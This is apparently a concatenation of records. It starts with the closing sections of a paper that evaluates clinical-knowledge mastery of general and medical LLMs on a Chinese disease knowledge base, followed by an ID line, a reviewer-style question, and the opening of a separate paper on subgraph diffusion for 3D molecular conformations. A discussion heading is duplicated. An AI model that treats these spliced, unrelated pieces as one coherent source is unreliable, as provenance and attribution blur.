| Basically Correct | esophageal abscess | affected body systems | digestive system | digestive system |

Table 3: Examples of LLMs' responses within the three tiers defined in Section 3.2.2.

4.2.2 DETAILED COMPARISON ACROSS LLMs

We further investigate clinical knowledge mastery across different LLMs by examining the distribution of each LLM's responses across the three tiers, showcased in the lower part of Figure 4. See Appendix H for a further comparison across knowledge aspects. Across all evaluated LLMs and metrics, over 40% of the clinical information generated by each LLM exhibits significant inconsistencies or conflicts with the knowledge stored in our knowledge base.
This indicates that the insufficient medical knowledge mastery of existing LLMs, demonstrated in Section 4.2.1, is not confined to a few models but is a widespread phenomenon among current LLMs. Moreover, we consider a group of LLMs sharing the same backbone model as an LLM series and compare medical knowledge mastery between series with a similar number of parameters (excluding ChatGPT). The general ranking is as follows: the Baichuan-7B series holds first place, the ChatGLM-6B series second, and the LLaMA-7B and Bloomz-7B series share third place. Remarkably, GPT-3.5-turbo (ChatGPT) stands out by achieving the highest proportion of "Basically Correct" and the lowest proportion of "Completely Wrong," surpassing all other LLMs in terms of clinical knowledge mastery. Additionally, ChatGPT achieves a higher "Basically Correct" proportion than "Partially Correct" in 2 out of 3 metrics, indicating that ChatGPT exhibits less hallucination and tends to avoid responding when faced with uncertain knowledge.

For a straightforward assessment of the clinical knowledge mastery of these LLMs, we begin by averaging the distributions of the three metrics for each LLM. Then, we perform a weighted summation across the three tiers, assigning scores of 0, 5, and 10 to "Completely Wrong," "Partially Correct," and "Basically Correct," respectively, to yield a total score for each LLM. This score is equivalent to the average score in Table 2, which achieves high consistency with expert assessment. Subsequently, we categorize the LLMs into four levels based on their total scores. The scoring process and outcomes are detailed in Figure 5 and Table 4, respectively. Surprisingly, none of the top three models have received specialized training on medical corpora, and most medical LLMs are placed in Level 3. Additionally, models sharing the same base architecture tend to attain similar scores (e.g., LLaMA, ChatDoctor, and BenTsao; ChatGLM, DoctorGLM, and BianQue-2), although a few exceptions exist (Vicuna, PULSE). These findings suggest that most current medical LLMs perform not significantly differently from their backbone models.

### 4.2.3 Medical LLMs Versus Their Backbone Models

To investigate the effect of continual training on medical corpora, we further conduct a significance analysis comparing each medical LLM with its corresponding backbone model. We employ Welch's t-test to assess six model pairs across all 18 aspects of disease knowledge, using cosine similarity for the analysis. The results of the t-test using the other metrics (ROUGE-1, BLEU-1) show similar trends and can be found in Appendix I. The findings are presented in Table 5. Within this table, the t-statistics reveal disparities in performance between medical LLMs and their backbone models across the knowledge aspects; asterisks denote statistical significance (p-value < 0.05). Green cells signify superior performance by the medical LLM compared with its backbone model on the respective aspect, red cells indicate poorer performance, and white cells indicate no significance. The experimental results reveal that 5 out of 6 medical LLMs underperform significantly compared to their base models in over half of the clinical knowledge aspects. PULSE stands out as the sole model achieving significant improvements on almost all evaluated aspects except the Severity Level.
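For reference, the per-aspect significance analysis reported in Table 5 can be reproduced with a standard Welch's t-test, as sketched below; the two score arrays are synthetic placeholders standing in for the per-disease cosine similarities of a medical LLM and its backbone model.

```python
import numpy as np
from scipy.stats import ttest_ind

rng = np.random.default_rng(42)
# Synthetic placeholders for per-disease cosine similarities on one knowledge aspect.
scores_medical = rng.normal(0.55, 0.20, size=10632).clip(0, 1)   # medical LLM
scores_backbone = rng.normal(0.50, 0.20, size=10632).clip(0, 1)  # its backbone model

# equal_var=False selects Welch's (unequal-variance) t-test.
t_stat, p_value = ttest_ind(scores_medical, scores_backbone, equal_var=False)
print(f"t = {t_stat:.1f}, significant at 0.05: {p_value < 0.05}")
```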
The significant improvement attained by PULSE can be attributed to its finetuning on approximately 4,000,000 instructions from both the Chinese medical field and the general domain. However, this improvement may also be amplified by the low performance of its backbone model, Bloomz-7.1B-mt, on the proposed evaluation benchmark (see Figure 4). Medical LLMs typically excel in certain aspects, such as Patient Population and Departments, but exhibit subpar performance in other areas, such as Anatomical Sites and Secondary Diseases. In summary, the results imply that most current medical LLMs do not achieve consistent enhancement of clinical knowledge mastery across all knowledge aspects compared to their backbone models, and may even suffer catastrophic forgetting in some aspects.

| Model | Type | Completely Wrong | Partially Correct | Basically Correct | Total Score | Level |
|----------------|--------|------------------|-------------------|-------------------|-------------|-------|
| GPT-3.5-turbo | General| 46.1% | 27.7% | 26.1% | 4.00 | 1 |
| Vicuna-7B | General| 54.2% | 28.9% | 17.3% | 3.14 | 2 |
| Baichuan-7B | General| 54.4% | 29.3% | 16.3% | 3.10 | 2 |
| HuatuoGPT-7B | Medical| 52.1% | 35.5% | 12.4% | 3.02 | 2 |
| PULSE-7B | Medical| 55.2% | 29.8% | 15.1% | 3.00 | 2 |
| DoctorGLM-6B | Medical| 60.7% | 23.6% | 15.7% | 2.75 | 3 |
| ChatGLM-6B | General| 58.0% | 29.8% | 12.1% | 2.70 | 3 |
| BianQue2-6B | Medical| 63.1% | 25.6% | 11.4% | 2.41 | 3 |
| LLaMA-7B | General| 67.2% | 18.3% | 14.4% | 2.36 | 3 |
| ChatDoctor-7B | Medical| 65.5% | 23.9% | 10.6% | 2.26 | 3 |
| BenTsao-7B | Medical| 68.3% | 19.4% | 12.2% | 2.20 | 3 |
| BLOOMZ-7B | General| 68.7% | 25.9% | 5.5% | 1.84 | 4 |

Table 4: The ranking of the evaluated LLMs based on total scores computed by the method presented in Figure 5, classified into four levels.

Figure 5: Calculating total scores from the distribution over the three tiers.

| Medical LLM | BianQue-2 | DoctorGLM | PULSE | HuatuoGPT |
|-------------|-----------|-----------|-------|-----------|
| Backbone Model | ChatGLM-6B | ChatGLM-6B | Bloomz-7B | Baichuan-7B |
| Patient Population | 15.0* | 36.7* | 27.0* | 40.2* |
| Prevalence Ages | 29.1* | 63.7* | 3.7* | -23.0* |
| Onset Ages | 68.0* | 173.1* | 17.9* | -112.2* |
| Primary Symptoms | -23.8* | -38.8* | 87.4* | 14.9* |
| Associated Symptoms | 2.8* | -7.4* | 13.6* | -2.1* |
| Differential Symptoms | -38.0* | -26.0* | 28.0* | 9.8* |
| Physical Examination | -53.8* | -14.5* | 13.8* | -29.6* |
| Anatomical Sites | -55.0* | -16.0* | 83.9* | -41.2* |
| Affected Sites | -41.8* | -11.6* | 56.0* | -29.3* |
| Affected Body Systems | -76.9* | -62.7* | 38.1* | 20.9* |
| Treatment Principles | 2.6* | 11.7* | 15.8* | 2.2* |
| Secondary Diseases | -13.1* | -45.8* | 22.9* | -28.4* |
| Medications | 11.9* | 4.9* | 21.1* | -17.7* |
| Surgical Procedures | -8.3* | -4.7* | 12.8* | -5.4* |
| Auxiliary Examinations | -35.1* | -9.7* | 9.4* | -27.7* |
| Laboratory Examinations | -30.6* | -12.9* | 25.1* | -10.4* |
| Departments | 4.4* | 5.0* | 106.6* | -12.4* |
| Severity Level | 17.9* | -18.5* | -41.3* | 43.3* |

Table 5: The results of Welch's t-test between each medical LLM and its backbone model across different aspects of diseases. Cosine similarity is applied in this analysis.

## 5 Discussion

**Medical Capabilities of Current LLMs** Large Language Models cannot be widely employed in real clinical tasks unless they master adequate clinical knowledge, exceptional medical comprehension,
## 5 Discussion

**Medical Capabilities of Current LLMs** Large Language Models cannot be widely employed in real clinical tasks unless they master adequate clinical knowledge, exceptional medical comprehension, and strong reasoning capabilities. Among these capabilities, sufficient clinical knowledge forms the foundation for the other two. Nevertheless, our experimental results demonstrate that all current LLMs are far from mastering adequate clinical knowledge.

**Performance of Current Medical LLMs** Though several medical LLMs are claimed to perform better than their backbone models on medical evaluation benchmarks, our evaluation results indicate that they do not achieve consistent improvement across all clinical knowledge aspects, and even degrade severely in some aspects. Moreover, these medical LLMs achieve inferior performance to some general LLMs with a similar number of parameters, such as Baichuan-7B and Vicuna-7B. Several factors may contribute to this phenomenon: 1. These medical LLMs have not undergone extensive pretraining on medical corpora; 2. Certain medical LLMs are trained for limited medical tasks and lack comprehensive training on diverse medical tasks; 3. The performance of a few medical LLMs may be inflated due to potential data leakage.

**Future Works** Medical LLMs have to master sufficient clinical knowledge before they can serve as foundation models in the medical domain. Our experiments on current medical LLMs indicate that small-scale finetuning on a limited set of medical tasks cannot inject adequate clinical knowledge into LLMs. Large-scale pretraining on medical corpora and supervised finetuning across diverse medical tasks may offer promising paths toward training foundation models in the medical domain.

## 6 Conclusion

We present in this paper an evaluation framework to assess the clinical knowledge mastery of LLMs. First, we construct a large-scale Chinese medical disease-based knowledge base, MedDisK, covering 10,632 common diseases and 18 clinical knowledge aspects that are essential in clinical practice. Building on that, we introduce a MedDisK-based evaluation method, MedDisKEval, utilizing the proposed clinical knowledge base to study the medical knowledge mastery of 12 general and medical LLMs. Our experimental results reveal that current LLMs have not mastered adequate clinical knowledge, indicating that they are not well prepared to serve as foundation models in the medical domain. A further in-depth study reveals that most current medical LLMs do not perform significantly better than their backbone models. In the future, we will continue maintaining the introduced knowledge base to ensure its accuracy and professionalism, and we will support more languages to facilitate research in this field.

## References

Yirong Chen, Zhenyu Wang, Xiaofen Xing, Zhipei Xu, Kai Fang, Sihang Li, Junhong Wang, and Xiangmin Xu. BianQue-1.0: Improving the "question" ability of medical chat model through finetuning with hybrid instructions and multi-turn doctor QA datasets. 2023. URL https://github.com/scutcyr/BianQue.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805, 2018.

Zhengxiao Du, Yujie Qian, Xiao Liu, Ming Ding, Jiezhong Qiu, Zhilin Yang, and Jie Tang. GLM: General language model pretraining with autoregressive blank infilling. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 320–335, 2022.

Junqing He, Mingming Fu, and Manshu Tu. Applying deep matching networks to Chinese medical question answering: A study and a dataset. BMC Medical Informatics and Decision Making, 19(2):52, 2019.
doi: 10.1186/s12911-019-0761-8.

Dan Hendrycks, Collin Burns, Steven Basart, Andy Zou, Mantas Mazeika, Dawn Song, and Jacob Steinhardt. Measuring massive multitask language understanding. In International Conference on Learning Representations, 2020.

Di Jin, Eileen Pan, Nassim Oufattole, Wei-Hung Weng, Hanyi Fang, and Peter Szolovits. What disease does this patient have? A large-scale open domain question answering dataset from medical exams. Applied Sciences, 11(14):6421, 2021.

Qiao Jin, Bhuwan Dhingra, Zhengping Liu, William Cohen, and Xinghua Lu. PubMedQA: A dataset for biomedical research question answering. In Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing and the 9th International Joint Conference on Natural Language Processing (EMNLP-IJCNLP), pp. 2567–2577, Hong Kong, China, November 2019. Association for Computational Linguistics. doi: 10.18653/v1/D19-1259. URL https://aclanthology.org/D19-1259.

Zeljko Kraljevic, Thomas Searle, Anthony Shek, Lukasz Roguski, Kawsar Noor, Daniel Bean, Aurelie Mascio, Leilei Zhu, Amos A Folarin, Angus Roberts, et al. Multi-domain clinical natural language processing with MedCAT: the Medical Concept Annotation Toolkit. Artificial Intelligence in Medicine, 117:102083, 2021.

Tiffany H Kung, Morgan Cheatham, Arielle Medenilla, Czarina Sillos, Lorie De Leon, Camille Elepano, Maria Madriaga, Rimel Aggabao, Giezel Diaz-Candido, James Maningo, et al. Performance of ChatGPT on USMLE: Potential for AI-assisted medical education using large language models. PLoS Digital Health, 2(2):e0000198, 2023.

Jinhyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, and Jaewoo Kang. BioBERT: a pre-trained biomedical language representation model for biomedical text mining. Bioinformatics, 36(4):1234–1240, 2020.

Yunxiang Li, Zihan Li, Kai Zhang, Ruilong Dan, Steve Jiang, and You Zhang. ChatDoctor: A medical chat model fine-tuned on a large language model Meta-AI (LLaMA) using medical domain knowledge. Cureus, 15(6), 2023.

Chin-Yew Lin. ROUGE: A package for automatic evaluation of summaries. In Text Summarization Branches Out, pp. 74–81, Barcelona, Spain, July 2004. Association for Computational Linguistics. URL https://aclanthology.org/W04-1013.

Niklas Muennighoff, Thomas Wang, Lintang Sutawika, Adam Roberts, Stella Biderman, Teven Le Scao, M Saiful Bari, Sheng Shen, Zheng Xin Yong, Hailey Schoelkopf, Xiangru Tang, Dragomir Radev, Alham Fikri Aji, Khalid Almubarak, Samuel Albanie, Zaid Alyafeai, Albert Webson, Edward Raff, and Colin Raffel. Crosslingual generalization through multitask finetuning. In Proceedings of the 61st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 15991–16111, Toronto, Canada, July 2023. Association for Computational Linguistics. doi: 10.18653/v1/2023.acl-long.891. URL https://aclanthology.org/2023.acl-long.891.
9g8h5HwZMy
Incorporating a well-designed prior distribution could also reduce the difficulty of the learning task, e.g., [EigenFold](https://arxiv.org/abs/2304.02198). The model should be able to figure out the correlations between data dimensions during training. Would this be more effective and easier to learn than introducing masks into the diffusion process?
Subgraph Diffusion for 3D Molecular Representation Learning: Combining Continuous and Discrete

Anonymous authors
Paper under double-blind review

Abstract

Molecular representation learning has shown great success in AI-based drug discovery. The 3D geometric structure contains crucial information about the underlying energy function, related to physical and chemical properties. Recently, denoising diffusion probabilistic models have achieved impressive results in molecular conformation generation. However, the knowledge of pre-trained diffusion models has not been fully exploited in molecular representation learning. In this paper, we study the representation learning ability inherent in diffusion models for conformation generation. We introduce a new general diffusion model framework called MaskedDiff for molecular representation learning. Instead of adding noise to all atoms like conventional diffusion models, MaskedDiff uses a discrete distribution to select a subset of the atoms to which continuous Gaussian noise is added at each step of the forward process. Further, we develop a novel subgraph diffusion model termed SubgDiff that enhances the perception of molecular substructure in the denoising network (noise predictor) by incorporating auxiliary subgraph predictors during training. Experiments on molecular conformation generation and 3D molecular property prediction demonstrate the superior performance of our approach.

## 1 INTRODUCTION

Molecular representation learning (MRL) has attracted tremendous attention due to its significant role in learning from limited labeled data for applications like AI-based drug discovery (Shen & Nicolaou, 2019) and material science (Pollice et al., 2021). From a physical chemistry perspective, the 3D molecular conformation can largely determine the properties of molecules and the activities of drugs (Cruz-Cabeza & Bernstein, 2014). Thus, numerous geometric neural network architectures and self-supervised learning strategies have been proposed to exploit 3D molecular structures and improve performance on downstream molecular property prediction tasks (Schütt et al., 2017; Zaidi et al., 2023; Liu et al., 2023a).

Meanwhile, diffusion probabilistic models (DPMs) have shown remarkable power in generating realistic samples, especially in synthesizing high-quality images and videos (Sohl-Dickstein et al., 2015; Ho et al., 2020). By modeling generation as a reverse diffusion process, DPMs transform random noise into a sample from the target distribution. Recently, diffusion models have demonstrated strong capabilities in 3D molecular conformation generation (Xu et al., 2022; Jing et al., 2022). The training process of a DPM for conformation generation can be viewed as the reconstruction of the original conformation from a noisy version, where the noise is modulated by different time steps. Consequently, the denoising objective in the diffusion model can naturally be used as a self-supervised representation learning technique (Pan et al., 2023). Inspired by this intuition, several works have used this technique for molecule pretraining (Liu et al., 2023b; Zaidi et al., 2023). Despite considerable progress, the potential of DPMs for molecular representation learning has not been fully exploited. In this paper, we intend to explore the potential of generative DPMs for MRL.

Figure 1: Equilibrium probability of the six ibuprofen conformers c1–c6 in four different conditions. The 3D substructure is a significant characteristic of a molecule.
To this aim, we raise the question: Can we effectively enhance the perception of 3D molecular structures with the denoising network (noise predictor) of a DPM? If yes, how can we achieve it?

To answer this question, we first analyze the gap between current DPMs and the characteristics of molecular structures. Most diffusion models on molecules independently inject continuous Gaussian noise into every node feature (Hoogeboom et al., 2022) or the atomic coordinates of the 3D molecular geometry (Xu et al., 2022; Zaidi et al., 2023). This, however, implicitly models each atom as a separate particle, neglecting the substructure in molecules, which plays a significant role in molecular representation learning (Yu & Gao, 2022; Wang et al., 2022a). As shown in Figure 1, the 3D geometric substructure contains crucial information about properties such as the equilibrium distribution, crystallization, and solubility (Marinova et al., 2018). As a result, uniformly adding same-scale Gaussian noise to all atoms makes it difficult for the denoising network to capture the properties of 3D molecules related to the substructure. We therefore try to answer the question above by training a DPM with knowledge of substructures.

Toward this goal, we first propose a general masked diffusion framework named MaskedDiff, which adds Gaussian noise to varying subsets of the 3D molecular conformation. Specifically, instead of adding the same Gaussian noise to every atomic coordinate, MaskedDiff introduces a discrete binary distribution into the diffusion process, where a mask vector sampled from the distribution selects a subset of the atoms, determining which substructure the noise is added to at the current time step (Figure 2). MaskedDiff unifies many mask-related diffusion models from other domains (Alcaraz & Strodthoff, 2022; Lei et al., 2023). Although MaskedDiff can be directly used for self-supervised learning, it cannot be employed for generative tasks due to the difficulty of determining the mask vector during generation.

In order to make MaskedDiff usable for both molecular conformation generation and self-supervised representation learning, we design a novel subgraph diffusion model termed SubgDiff, which incorporates a mask predictor (akin to a node classifier) into MaskedDiff during training, explicitly compelling the denoising network to capture substructure information from the molecules. In SubgDiff, the substructure is concretized as a subgraph of the molecular graph. The mask predictor can also be used to generate the mask vector during molecule generation, thereby giving SubgDiff generative ability. With the ability to capture substructure information from noisy 3D molecules, the denoising network gains more representation power. This is made possible by the discrete distribution involved in the diffusion model, which, in contrast to conventional same-scale Gaussian models, captures subgraphs in the noisy graphs. These improvements enhance the performance of SubgDiff on molecular conformation generation and 3D molecular representation learning tasks. The experiments on molecular conformation generation and 3D molecular property prediction demonstrate the superior performance of our approach.

The key contributions of this paper are as follows: (1) The paper proposes a novel general masked diffusion model framework, MaskedDiff.
This framework combines continuous and discrete characteristics and is thereby capable of recovering many typical diffusion models. (2) A new diffusion model, SubgDiff, is designed to enhance the representation power of the DPM for molecular conformation generation by equipping the diffusion process with a subgraph constraint. SubgDiff can be used for molecular conformation generation and self-supervised representation learning. (3) The proposed method achieves superior performance on molecular conformation generation and 3D molecular property prediction tasks compared to typical continuous diffusion models.

---

1 Adapted with permission from Marinova et al. (2018). Copyright 2018 American Chemical Society.

## 2 RELATED WORK

**Diffusion models on graphs.** Diffusion models on graphs can be divided into two main categories: continuous diffusion and discrete diffusion. Continuous diffusion applies a Gaussian noise process to each node or edge (Ingraham et al., 2019; Niu et al., 2020), including GeoDiff (Xu et al., 2022) and EDM (Hoogeboom et al., 2022). Meanwhile, discrete diffusion constructs the Markov chain on a discrete space, including DiGress (Haefeli et al., 2022) and GraphARM (Kong et al., 2023a). However, it remains an open question how to fuse discrete characteristics into continuous Gaussian diffusion for graph learning, although a closely related work has been proposed for images and cannot be used for generation (Pan et al., 2023). Our work, SubgDiff, is the first masked diffusion model for graphs, combining discrete characteristics with continuous Gaussian noise.

**Conformation generation.** Various deep generative models have been proposed for conformation generation, including CVGAE (Mansimov et al., 2019), GraphDG (Simm & Hernandez-Lobato, 2020), CGCF (Xu et al., 2021a), ConfVAE (Xu et al., 2021b), ConfGF (Shi et al., 2021), and GeoMol (Ganea et al., 2021). Recently, diffusion-based methods have shown competitive performance. Torsional Diffusion (Jing et al., 2022) defines a diffusion process on the hypertorus spanned by torsion angles. However, it is not suitable as a self-supervised learning technique due to the lack of local information (bond lengths and angles). GeoDiff (Xu et al., 2022) generates molecular conformations by running a conventional diffusion model on atomic coordinates. However, these methods view atoms as separate particles, without considering the critical dependence between atoms, especially the substructure.

**SSL for 3D molecular property prediction.** Several works leverage 3D molecular conformations to boost representation learning, including GeoSSL (Liu et al., 2023b), the denoising pretraining approach of Zaidi et al. (2023), and MoleculeSDE (Liu et al., 2023a). However, these studies have not considered molecular substructure in the pretraining. In this paper, we concentrate on how to boost the perception of molecular substructure in the denoising network through the diffusion model.

## 3 PRELIMINARIES

**Notations.** We use $I$ to denote the identity matrix with dimensionality implied by context. $\odot$ represents the element-wise product, and $\mathrm{diag}(s)$ denotes the diagonal matrix whose diagonal elements are the entries of the vector $s$.
The topological molecular graph can be denoted as $G(V,E,X)$, where $V$ is the set of nodes, $E$ is the set of edges, and $X$ is the node feature matrix; its corresponding 3D conformational molecular graph is represented as $G_{3D}(G,R)$, where $R = [R_1, \cdots, R_{|V|}] \in \mathbb{R}^{|V| \times 3}$ collects the 3D coordinates of the atoms.

**DDPM.** Denoising diffusion probabilistic models (DDPM) (Ho et al., 2020) are a typical class of diffusion models (Sohl-Dickstein et al., 2015) consisting of a diffusion (aka forward) process and a reverse process. In the setting of molecular conformation generation, the diffusion model adds noise to the 3D molecular coordinates $R$ (Xu et al., 2022).

**Forward Process.** Given the fixed variance schedule $\beta_1, \beta_2, \cdots, \beta_T$, the posterior distribution $q(R^{1:T}|R^0)$, fixed to a Markov chain, can be written as

$$q(R^{1:T}|R^0) = \prod_{t=1}^{T} q(R^t|R^{t-1}), \quad q(R^t|R^{t-1}) = \mathcal{N}(R^t; \sqrt{1 - \beta_t}\,R^{t-1}, \beta_t I).$$

To simplify notation, we consider the diffusion of a single atom coordinate $R_v$ and omit the subscript $v$ to obtain the general notation $R$ throughout the paper. Let $\alpha_t = 1 - \beta_t$ and $\bar{\alpha}_t = \prod_{i=1}^{t}(1 - \beta_i)$; then the sampling of $R^t$ at any time step $t$ has the closed form $q(R^t|R^0) = \mathcal{N}(R^t; \sqrt{\bar{\alpha}_t}\,R^0, (1 - \bar{\alpha}_t)I)$.

**Reverse Process and Training.** The reverse process is defined as a Markov chain starting from a Gaussian distribution $p(R^T) = \mathcal{N}(R^T; 0, I)$:

$$p_\theta(R^{0:T}) = p(R^T) \prod_{t=1}^{T} p_\theta(R^{t-1}|R^t); \quad p_\theta(R^{t-1}|R^t) = \mathcal{N}(R^{t-1}; \mu_\theta(R^t, t), \sigma_t^2 I),$$

where $\sigma_t^2 = \frac{1 - \bar{\alpha}_{t-1}}{1 - \bar{\alpha}_t} \beta_t$ is a time-dependent constant. In DDPM, $\mu_\theta(R^t, t)$ is parameterized as $\mu_\theta(R^t, t) = \frac{1}{\sqrt{\alpha_t}}\big(R^t - \frac{\beta_t}{\sqrt{1 - \bar{\alpha}_t}}\epsilon_\theta(R^t, t)\big)$, and $\epsilon_\theta$, i.e., the denoising network, is parameterized by a neural network whose inputs are $R^t$ and the time step $t$. The training objective of DDPM is:

$$L_{\text{simple}}(\theta) = \mathbb{E}_{t,R^0,\epsilon}\big[\|\epsilon - \epsilon_\theta(\sqrt{\bar{\alpha}_t}\, R^0 + \sqrt{1-\bar{\alpha}_t}\,\epsilon,\ t)\|^2\big], \quad \epsilon \sim \mathcal{N}(0, I). \tag{3}$$

**Sampling.** After training, samples are generated through the reverse process $p_\theta(R^{0:T})$. Specifically, $R^T$ is first sampled from $\mathcal{N}(0, I)$, and $R^{t-1}$ at each step is predicted as follows:

$$R^{t-1} = \frac{1}{\sqrt{\alpha_t}} \Big(R^t - \frac{1-\alpha_t}{\sqrt{1-\bar{\alpha}_t}}\, \epsilon_\theta(R^t, t)\Big) + \sigma_t z, \quad z \sim \mathcal{N}(0, I). \tag{4}$$

## 4 METHODOLOGY

Directly applying the typical diffusion model to the atomic coordinates of a 3D molecule means each atom is treated as an independent data point. However, subgraphs play an important role in molecular generation (Jin et al., 2020) and representation learning (Zang et al., 2023). Therefore, ignoring connections between nodes may hurt the denoising network's ability to capture molecular substructure. Here, we propose to introduce a mask operation into each diffusion step, yielding a new masked diffusion for 3D molecular representation learning. Further, we also include a mask predictor and reset the state of the Markov chain to an expectation over the mask distribution, leading to a new diffusion model, SubgDiff, for molecular generation and representation.
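To make these preliminaries concrete, here is a minimal PyTorch sketch (our illustration, not the authors' released code) of the closed-form forward noising and the DDPM training objective in equation 3; the schedule values are illustrative.

```python
# Sketch: one DDPM training step on atomic coordinates R^0 (equation 3).
import torch

T = 1000
betas = torch.linspace(1e-4, 2e-2, T)            # variance schedule beta_1..beta_T
alpha_bars = torch.cumprod(1.0 - betas, dim=0)   # alpha_bar_t = prod_i (1 - beta_i)

def ddpm_loss(eps_model, R0):
    """R0: (num_atoms, 3) coordinates; eps_model(R_t, t) predicts the noise."""
    t = torch.randint(0, T, (1,))
    eps = torch.randn_like(R0)
    a_bar = alpha_bars[t]
    # Closed-form sample: R^t = sqrt(a_bar) * R^0 + sqrt(1 - a_bar) * eps.
    R_t = a_bar.sqrt() * R0 + (1.0 - a_bar).sqrt() * eps
    return ((eps - eps_model(R_t, t)) ** 2).mean()
```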
### 4.1 AN IMPORTANT LEMMA FOR DIFFUSION MODELS

According to Sohl-Dickstein et al. (2015) and Ho et al. (2020), the diffusion model is trained by optimizing a variational bound on the negative log-likelihood $-\log p_\theta(R^0)$, in which the tricky terms are $L_{t-1} = D_{KL}(q(R^{t-1}|R^t, R^0)\,\|\,p_\theta(R^{t-1}|R^t))$, $T \geq t > 1$. Here we provide a lemma showing that the posterior distribution $q(R^{t-1}|R^t, R^0)$ used in the training and sampling algorithms of the diffusion model is determined by $q(R^t|R^{t-1}, R^0)$ and $q(R^{t-1}|R^0)$. Formally, we have

**Lemma 4.1** Assume the forward and reverse processes of the diffusion model are both Markov chains. Given the forward Gaussian distributions $q(R^t|R^{t-1}, R^0) = \mathcal{N}(R^t; \mu_1 R^{t-1}, \sigma_1^2 I)$ and $q(R^{t-1}|R^0) = \mathcal{N}(R^{t-1}; \mu_2 R^0, \sigma_2^2 I)$, and $\epsilon_0 \sim \mathcal{N}(0, I)$, the distribution $q(R^{t-1}|R^t, R^0)$ is

$$q(R^{t-1}|R^t, R^0) = \mathcal{N}\Big(R^{t-1};\ \frac{1}{\mu_1} \Big(R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}}\, \epsilon_0\Big),\ \frac{\sigma_1^2 \sigma_2^2}{\mu_1^2 \sigma_2^2 + \sigma_1^2}\, I\Big). \tag{5}$$

Parameterizing $p_\theta(R^{t-1}|R^t)$ in the reverse process as $\mathcal{N}\big(R^{t-1}; \frac{1}{\mu_1} (R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}} \epsilon_\theta(R^t, t)), \frac{\sigma_1^2 \sigma_2^2}{\mu_1^2 \sigma_2^2 + \sigma_1^2} I\big)$, the training objective of the DPM can be written as

$$L(\theta) = \mathbb{E}_{t,R^0,\epsilon}\Big[\frac{\sigma_1^2}{2\mu_1^2 \sigma_2^2}\, \big\|\epsilon - \epsilon_\theta\big(\mu_1 \mu_2 R^0 + \sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}\, \epsilon,\ t\big)\big\|^2\Big], \tag{6}$$

and the sampling (reverse) process is

$$R^{t-1} = \frac{1}{\mu_1} \Big(R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}}\, \epsilon_\theta(R^t, t)\Big) + \frac{\sigma_1 \sigma_2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}}\, z, \quad z \sim \mathcal{N}(0, I). \tag{7}$$

The proof of the lemma can be found in the Appendix. Once we obtain the variables $(\mu_1, \sigma_1, \mu_2, \sigma_2)$, we can directly derive the training objective and sampling process via Lemma 4.1, which facilitates the design of new diffusion models.

### 4.2 MASKED DIFFUSION MODEL

Let us focus on the typical DDPM. Using the reparameterization trick, we have $R^t_v = \sqrt{1-\beta_t}\, R^{t-1}_v + \sqrt{\beta_t}\, \epsilon_{t-1}$, $\forall v \in V$, in which the Gaussian noise $\epsilon_{t-1}$ is injected into every atom. Moreover, the training objective in equation 3 shows that the denoising network always predicts a Gaussian noise for all atoms. Neither the diffusion nor the denoising process of DDPM takes the substructure of the molecule into account. Instead, we propose **MaskedDiff**, where a mask vector $s_t = [s_{t1}, \cdots, s_{t|V|}]^T \in \{0, 1\}^{|V|}$ is sampled from a discrete distribution $p_{s_t}(S)$ to select a subset of the atoms, determining which atoms receive noise at step $t$.

Figure 3: The Markov chain of MaskedDiff is a lazy Markov chain.

In molecular graphs, the discrete mask distribution $p_{s_t}(S)$ is equivalent to a subgraph distribution, defined over a predefined sample space $\chi = \{G_{\text{sub}}^i\}_{i=1}^{N}$, where each sample is a connected subgraph extracted from $G$. Further, the predefined distribution $p_{s_t}(S)$ should ensure that the selected connected subgraphs cohere with the molecular substructures. Here, we adopt a torsional-based decomposition method (Jing et al., 2022) (subsec. 4.3.3).
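To make the mask operation concrete, the following is a minimal sketch (our illustration, not the authors' code) of a single MaskedDiff forward step: a connected-subgraph mask is drawn uniformly from a precomputed set, and only the selected atoms are noised, as formalized next in equation 8.

```python
# Sketch: one MaskedDiff forward step with a uniformly sampled subgraph mask.
import torch

def masked_diffusion_step(R_prev, beta_t, subgraph_masks):
    """R_prev: (|V|, 3) atom coordinates; beta_t: noise scale at step t;
    subgraph_masks: list of {0,1} vectors of length |V|, each a connected
    subgraph from the torsional-based decomposition (assumed precomputed)."""
    idx = torch.randint(0, len(subgraph_masks), (1,)).item()
    s_t = subgraph_masks[idx].float().unsqueeze(-1)   # (|V|, 1), broadcast to xyz
    eps = torch.randn_like(R_prev)
    # Selected atoms follow the DDPM transition; unselected atoms stay fixed.
    R_t = torch.sqrt(1.0 - s_t * beta_t) * R_prev + torch.sqrt(s_t * beta_t) * eps
    return R_t, s_t.squeeze(-1)
```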
With this mask distribution, the state transition of MaskedDiff can be formulated as (Figure 3): $R_v^t = \sqrt{1 - \beta_t}\, R_v^{t-1} + \sqrt{\beta_t}\, \epsilon_{t-1}$ if $s_{tv} = 1$, and $R_v^t = R_v^{t-1}$ otherwise, which can be rewritten as

$$R_v^t = \sqrt{1 - s_{tv} \beta_t}\, R_v^{t-1} + \sqrt{s_{tv} \beta_t}\, \epsilon_{t-1}.$$

The posterior distribution $q(R^{1:T}|R^0)$ can be expressed in matrix form:

$$q(R^{1:T}|R^0) = \prod_{t=1}^{T} q(R^t|R^{t-1}); \quad q(R^t|R^{t-1}) = \mathcal{N}\big(R^t;\ \sqrt{I - \beta_t\, \mathrm{diag}(s_t)}\; R^{t-1},\ \beta_t\, \mathrm{diag}(s_t)\big). \tag{8}$$

